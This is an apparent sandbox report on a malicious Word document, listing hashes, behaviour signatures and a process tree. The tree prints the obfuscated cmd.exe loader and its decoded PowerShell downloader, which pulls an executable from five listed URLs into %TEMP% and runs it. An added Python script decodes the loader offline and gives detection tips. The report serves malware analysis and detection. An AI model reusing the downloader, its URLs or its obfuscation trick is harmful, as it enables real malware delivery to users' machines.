Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    30-04-2024 00:03

General

  • Target

    088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc

  • Size

    138KB

  • MD5

    088e0aa1d899cc55046dcd2f1ae592a3

  • SHA1

    b40b2f3cb411e37f55d101d9019a50666160ff7b

  • SHA256

    302d111df88971a8852fad6dcfc4463c0ee7cbddd465ac127c0702c59d2757cb

  • SHA512

    f60bf916c05b45be2f86a88571fa1d52ea0c4fd4170ccdaf1f26799280d2e14aa366c0e2e22a963f1485592cac3a5b5b662445c3239f6c65cddabe9380b9e644

  • SSDEEP

    1536:dP981ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadk+aRbPJl21X/lnnF:d18GhDS0o9zTGOZD6EbzCdw32NhF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2992
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pmet:vne$=XMC$;'OVL'=IZY$;'865' = wSw$;'TBZ'=jSP$;)'@'(tilpS.'FXXm1xSO/moc.oidutssdnimlacigam//:ptth@k98SL52Oqg/moc.stnapyknufcm//:ptth@lE9pfhVr/moc.namllimleahcim//:ptth@iqRsEeZTG/moc.zyobeniram//:ptth@pFksMeQWB/moc.dleifekaweram//:ptth'=sQD$;tneilCbeW.teN tcejbo-wen=ihP$;'HVk'=wiw$ llehsrewop&&for /L %b in (472,-1,0)do set uw=!uw!!D5:~%b,1!&&if %b equ 0 echo !uw:~-473! |FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^^^|findstr Cons')DO %5 -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo powershell $wiw='kVH';$Phi=new-object Net.WebClient;$DQs='http://marewakefield.com/BWQeMskFp@http://marineboyz.com/GTZeEsRqi@http://michaelmillman.com/rVhfp9El@http://mcfunkypants.com/gqO25LS89k@http://magicalmindsstudio.com/OSx1mXXF'.Split('@');$PSj='ZBT';$wSw = '568';$YZI='LVO';$CMX=$env:temp+'\'+$wSw+'.exe';foreach($qYv in $DQs){try{$Phi.DownloadFile($qYv, $CMX);$OYq='rtu';If ((Get-Item $CMX).length -ge 80000) {Invoke-Item $CMX;$jbl='MQi';break;}}catch{}}$uGY='AJA'; "
          3⤵
            PID:2444
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^|findstr Cons') DO %5 -"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ftype|findstr Cons
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2488
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ftype"
                5⤵
                  PID:2500
                • C:\Windows\SysWOW64\findstr.exe
                  findstr Cons
                  5⤵
                    PID:2236
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2852
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =kVH
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:860

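The cmd.exe command line for PID 2556 above is the interesting artifact: the long `set D5=` value is the PowerShell downloader written backwards, the `for /L %b in (472,-1,0)` loop with delayed expansion (`/V:`) rebuilds it one character at a time, and `FOR /F "tokens=12 delims=\n.D5" ... ('ftype^|findstr Cons')` pulls the word `powershell` out of the output of `ftype`, so the interpreter name never appears in that command line and the script itself reaches PowerShell on stdin (`powershell -`, PID 2852). The script below is an added example, not part of this report or of the sample: it emulates those two batch tricks offline, recovers the downloader that the report shows echoed by PID 2444, and extracts the IOCs from it. The `ftype` output line it tokenises is constructed (a typical Windows 7 value), since the report does not capture it; only the token position matters.

```python
"""Static triage of the reversed-string cmd.exe loader from the process tree above.

Added example (not part of the sandbox report): emulates the batch-level
obfuscation so the PowerShell downloader can be recovered without running it,
then pulls the IOCs out of the recovered script.
"""
import re

# Copied verbatim from the cmd.exe command line of PID 2556 in the report.
CMDLINE = r'''"C:\Windows\system32\cmd.exe" /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pmet:vne$=XMC$;'OVL'=IZY$;'865' = wSw$;'TBZ'=jSP$;)'@'(tilpS.'FXXm1xSO/moc.oidutssdnimlacigam//:ptth@k98SL52Oqg/moc.stnapyknufcm//:ptth@lE9pfhVr/moc.namllimleahcim//:ptth@iqRsEeZTG/moc.zyobeniram//:ptth@pFksMeQWB/moc.dleifekaweram//:ptth'=sQD$;tneilCbeW.teN tcejbo-wen=ihP$;'HVk'=wiw$ llehsrewop&&for /L %b in (472,-1,0)do set uw=!uw!!D5:~%b,1!&&if %b equ 0 echo !uw:~-473! |FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^^^|findstr Cons')DO %5 -"'''

# Constructed (assumption): the `ftype` line that `findstr Cons` selects on a
# Windows 7 host. The report does not capture it; only the token position matters.
FTYPE_LINE = r'Microsoft.PowerShellConsole.1="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "%1"'


def recover_reversed_string(cmdline: str) -> str:
    """Emulate `set VAR=...` followed by
    `for /L %b in (START,-1,0) do set uw=!uw!!VAR:~%b,1!` and `echo !uw:~-KEEP!`.
    With delayed expansion each iteration appends the single character VAR[b],
    walking b from START down to 0, so the loop reverses VAR[:START+1]; the
    final `:~-KEEP` keeps the last KEEP characters of the result."""
    m = re.search(r'set (\w+)=(.*?)&&for /L %\w in \((\d+),-1,0\)', cmdline, re.S)
    k = re.search(r'echo !\w+:~-(\d+)!', cmdline)
    if not (m and k):
        raise ValueError('reversal loop not found')
    value, start, keep = m.group(2), int(m.group(3)), int(k.group(1))
    out = ''.join(value[b:b + 1] for b in range(start, -1, -1))  # past-end slice -> ''
    return out[-keep:]


def parse_for_f_options(cmdline: str) -> tuple:
    """Read the tokens=N delims=... options of the FOR /F that names the interpreter."""
    m = re.search(r'tokens=(\d+) delims=([^"]*)"', cmdline)
    if not m:
        raise ValueError('FOR /F options not found')
    return int(m.group(1)), m.group(2)


def for_f_token(line: str, tokens: int, delims: str) -> str:
    """Emulate FOR /F tokenisation: split on any delimiter character, collapse
    runs of delimiters (cmd skips empty fields) and return the 1-based N-th field."""
    fields = [f for f in re.split('[' + re.escape(delims) + ']', line) if f]
    return fields[tokens - 1] if len(fields) >= tokens else ''


def extract_iocs(script: str) -> dict:
    """Pull the download URLs, the size gate and the drop path out of the
    recovered PowerShell downloader by resolving its string-literal variables."""
    urls = re.findall(r"https?://[^'@\s]+", script)
    gate = re.search(r'\.length -ge (\d+)', script)
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script))
    # e.g. $CMX=$env:temp+'\'+$wSw+'.exe'; is a concatenation of an env var,
    # quoted literals and $variables that were assigned literals earlier.
    expr = re.search(r"\$\w+=(\$env:temp(?:\+(?:'[^']*'|\$\w+))+);", script)
    path = ''
    if expr:
        for piece in expr.group(1).split('+'):
            if piece.startswith('$env:'):
                path += '%' + piece[5:].upper() + '%'
            elif piece.startswith("'"):
                path += piece.strip("'")
            else:
                path += literals.get(piece[1:], piece)
    return {'urls': urls,
            'min_size': int(gate.group(1)) if gate else None,
            'drop_path': path}


if __name__ == '__main__':
    script = recover_reversed_string(CMDLINE)
    tokens, delims = parse_for_f_options(CMDLINE)
    print('interpreter token :', for_f_token(FTYPE_LINE, tokens, delims))
    print('recovered script  :', script)
    for key, val in extract_iocs(script).items():
        print(f'{key:18}:', val)
```

Detection caveat that follows from the tree: the PowerShell child is logged only as `powershell -` (PID 2852) and receives the script on stdin from the `echo` in PID 2444, so the downloader text is visible only in the parent cmd.exe command line (PID 2556). A command-line hunt therefore has to match the parent (`/V:/C`, a `set` with a long reversed value, a `for /L` countdown and `ftype|findstr`), not the PowerShell process itself, and the drop path `%TEMP%\<digits>.exe` plus the 80000-byte size gate are the host-side indicators to pair with the five download URLs.
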
          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            20KB

            MD5

            0dd67614d86cfa1dab9c2be3261426dc

            SHA1

            3add846df66fe6ce06c46cfe4b6dd549a7e6d14b

            SHA256

            1dbf34343cf4ee9adb7a9a7385420630711a1912b94fe3e6ad8f004edc07bfca

            SHA512

            2710a907e90fd19d583b1de36cb630641136357e609fc4cdb2f8007f21e2dc9edd040acc7eece14dd78e8b9eb107171e726a467031c0d101e618caae1da69cec

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            2b8ed63395b1c2cd7ecd835da2ae2ee2

            SHA1

            44fd9947d1187545fa18685e02f471d96d4fddbc

            SHA256

            d768ef3b135a460ee05437dbb99d372f18f698231a06f49d3c71bf5574eeff7c

            SHA512

            cc2a713af2cc20632ceb184947d6de31bf2a63192381bf2e89d2ed3d5a35acdec7668740a4364f100eeda643f562ba983d26a308f32c11371a8b050c88b96a51

          • memory/1284-2-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
            Filesize

            44KB

          • memory/1284-6-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

          • memory/1284-7-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

          • memory/1284-8-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

          • memory/1284-0-0x000000002F7E1000-0x000000002F7E2000-memory.dmp
            Filesize

            4KB

          • memory/1284-21-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
            Filesize

            44KB

          • memory/1284-22-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

          • memory/1284-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1284-38-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1284-39-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
            Filesize

            44KB

          • memory/1284-40-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB